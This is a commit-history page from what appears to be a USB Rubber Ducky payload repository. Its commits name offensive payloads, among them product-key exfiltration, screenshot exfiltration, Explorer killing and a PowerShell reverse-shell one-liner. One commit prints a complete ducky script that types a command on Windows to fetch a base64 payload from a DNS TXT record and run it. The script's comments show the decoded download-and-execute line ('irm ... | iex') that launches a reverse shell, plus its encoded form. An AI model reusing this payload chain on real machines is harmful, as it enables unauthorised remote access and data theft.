Commit Graph

1326 Commits (05ee32800a60d739d9ddb22d0d419f764c2482a5)

Author SHA1 Message Date
Julien M f7d2f37def Remove duplicate function 2024-08-22 22:16:56 +02:00
Peaks d02b817225
Merge pull request #400 from aleff-github/patch-80
Exfiltrate Windows Product Key
2024-08-21 18:42:57 -04:00
Alessandro Greco 828c60acca Adapted with DUCKY_DRIVE_LABEL 2024-08-21 07:41:47 +02:00
Peaks 404640f615
Merge pull request #427 from aleff-github/patch-83
Extension: SAVE FILES IN RUBBER DUCKY STORAGE
2024-08-20 17:04:28 -04:00
Alessandro Greco 9e6b405745 from - to _ 2024-08-20 12:33:10 +02:00
Alessandro Greco c895160753 from - to _ 2024-08-20 12:27:36 +02:00
Peaks 5c1ec51393
Merge pull request #470 from nathansb2022/master
Create Kill-Explorer.txt
2024-08-17 18:28:48 -04:00
Nate afe674fcda
Create README.md 2024-08-06 19:30:25 -05:00
Nate a9afcc0c6d
Create Kill-Explorer.txt
initial commit with ducky script
2024-08-06 19:29:22 -05:00
Peaks e1531cc317
Merge pull request #468 from nathansb2022/master
Create payload DNS-TXT-CommandInjection.txt
2024-08-06 17:19:17 -04:00
Peaks d08e573962
Merge pull request #469 from thomasboegl1/master
Add Windows-Screenshot-Exfil payload
2024-08-06 17:14:00 -04:00
Thomas Boeglin f0cb608d09 Add Windows-Screenshot-Exfil payload 2024-08-06 09:58:39 +02:00
Nate f2896f0b6f
Update DNS-TXT-CommandInjection.txt
Added PASSIVE_WINDOWS_DETECT EXTENSION per requested changes in pull request.
2024-08-05 14:21:46 -05:00
Nate 8eba7c5e9b
Delete payloads/library/execution/Kill-Explorer directory 2024-08-04 20:13:49 -05:00
Nate 5928326db7
Update README.md 2024-08-04 20:08:11 -05:00
Nate 42d2d6e9d5
Create Kill-Explorer.txt 2024-08-04 20:07:36 -05:00
Nate 97ae3a7339
Create README.md 2024-08-04 20:06:35 -05:00
Nate e1c39bd455
Create DNS-TXT-CommandInjection.txt
Made changes requested from pull request. 1. Please remove this file as it is not needed. - removed .gitignore
2. I would recommend using a REM_BLOCK - added REM_BLOCK
3. I would include all of this in your readme.md it should contain all of this information. Having it in the payload clutters up the actually payload content. - Removed the clutter
4. If your target machine is windows you can use the PASSIVE_WINDOWS_DETECT extension. This extension will dynamically determine start delay and also ensure that the payload is ran on the correct OS. - added EXTENSION PASSIVE_WINDOWS_DETECT and updated the extension to new version. Ended up with the payload not executing.So, removed extension added in delay.
5. I would recommend using STRINGLN - added STRINGLN
6. also make sure to have a # before your DEFINE calls. #MY_TARGET_URL - added the # to MY_TARGET_URL
7. Why is this ps1 included? - removed ConvertBase64.ps1
8. Why is this file included? this is just a .txt of the powershellReverseShellOne-liner.ps1 file you uploaded. - removed T1.txt
2024-08-04 18:08:21 -05:00
Nate f43a37e607
Create powershellReverseShellOne-liner.ps1
updated comments
2024-08-04 18:04:18 -05:00
Nate 5ff699caa2
Update README.md
fixed formatting
2024-08-04 18:01:43 -05:00
Nate ae0d976dce
Update README.md
fixed formatting
2024-08-04 18:01:10 -05:00
Nate 7658b87ce0
Update README.md
fixed readme formatting
2024-08-04 18:00:29 -05:00
Nate abd0a09360
Create README.md
Updated to reflect requested changes from pull request.
2024-08-04 17:58:09 -05:00
Nate c8e0ac280b
Delete payloads/library/execution/DNS-TXT-CommandInjection directory
deleting and removing files from requested changes in Pull request
2024-08-04 14:29:33 -05:00
Nate 1fd0843049
Delete payloads/library/execution/DNS-TXT-CommandInection directory
misspelled injection, deleting the directory, all content has been moved to DNS-TXT-CommandInjection direcotory
2024-08-04 10:46:16 -05:00
Nate 7c989706cc
Update DNS-TXT-CommandInjection.txt
updated folder, misspelled injection and update link to ConvertBase64.ps1
2024-08-04 10:41:20 -05:00
Nate c1608976d9
Update README.md
updated folder, misspelled injection and updated link to ConvertBase64.ps1
2024-08-04 10:38:54 -05:00
Nate 072a5dbc8a
Create ConvertBase64.ps1
updated folder, misspelled injection
2024-08-04 10:37:16 -05:00
Nate cea9eb46ef
Create powershellReverseShellOne-liner.ps1
updated folder, misspelled commandInjection
2024-08-04 10:35:42 -05:00
Nate e985ed3a61
Create T1.txt
updated folder, misspelled injection
2024-08-04 10:34:32 -05:00
Nate 3b8a1d9ec5
Create README.md
updating to new folder, misspelled injection
2024-08-04 10:33:19 -05:00
Nate c832c1868c
Create DNS-TXT-CommandInjection.txt
misspelled Injection in file name
2024-08-04 10:31:39 -05:00
Nate 867b15eb6d
Create .gitignore
misspelled folder
2024-08-04 10:29:45 -05:00
Nate 054f81e077
Update DNS-TXT-CommandInection.txt
misspelled injection
2024-08-04 10:24:30 -05:00
Nate e4cbee78f1
Update README.md
misspelled injection
2024-08-04 10:23:43 -05:00
Nate 2782d874c9
Update README.md 2024-08-03 23:50:18 -05:00
Nate ada8bf9ea7
Update DNS-TXT-CommandInection.txt 2024-08-03 23:47:09 -05:00
Nate 13355e8519
Update README.md 2024-08-03 23:43:50 -05:00
Nate fc745db314
Update README.md 2024-08-03 23:40:57 -05:00
Nate b4978b7b47
Update DNS-TXT-CommandInection.txt 2024-08-03 23:37:33 -05:00
Nate 1db132c3ac
Update README.md 2024-08-03 23:36:21 -05:00
Nate 902412339b
Update DNS-TXT-CommandInection.txt 2024-08-03 23:35:02 -05:00
Nate 7a36e6324a
Update powershellReverseShellOne-liner.ps1 2024-08-03 23:33:41 -05:00
Nate dad3d550fe
Create DNS-TXT-CommandInection.txt
REM     Title: DNS-TXT-CommandInection
REM     Author: Nate
REM     Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM     Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM     the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM 	and an example of creating your DNS TXT record in AWS Route53 service.
REM     Target: Windows 10, 11
REM     Props: Hak5, Darren Kitchen, Korben
REM     Version: 1.0
REM     Category: Execution

REM     CONFIGURATION
REM     REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM     REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a 
REM     reverseshell.
REM     REQUIRED - Provide URL used for Example
DEFINE  #MY_TARGET_URL example.com
REM     Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM     Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"

REM     NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM     for the STRING payload below. Examples of the decoded command and encoded command are shown below to put 
REM     into DNS TXT record.
REM     Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM     Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="

REM     ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM     https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM     The link below has the Powershell script to convert your payloads to Base64.
REM     https://	

DELAY 1000 
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
2024-08-03 23:32:09 -05:00
Nate 571e2e6e33
Create T1.txt 2024-08-03 23:30:46 -05:00
Nate 3578034173
Create powershellReverseShellOne-liner.ps1 2024-08-03 23:30:02 -05:00
Nate b31e55d14a
Create convertBase64.ps1 2024-08-03 23:29:01 -05:00
Nate 784e37b063
Create README.md 2024-08-03 23:27:09 -05:00
Nate 460c95f5df
Update .gitignore 2024-08-03 21:19:44 -05:00
Nate b1999a0e7e
Create .gitignore
.gitignore as a placeholder
2024-08-03 21:17:34 -05:00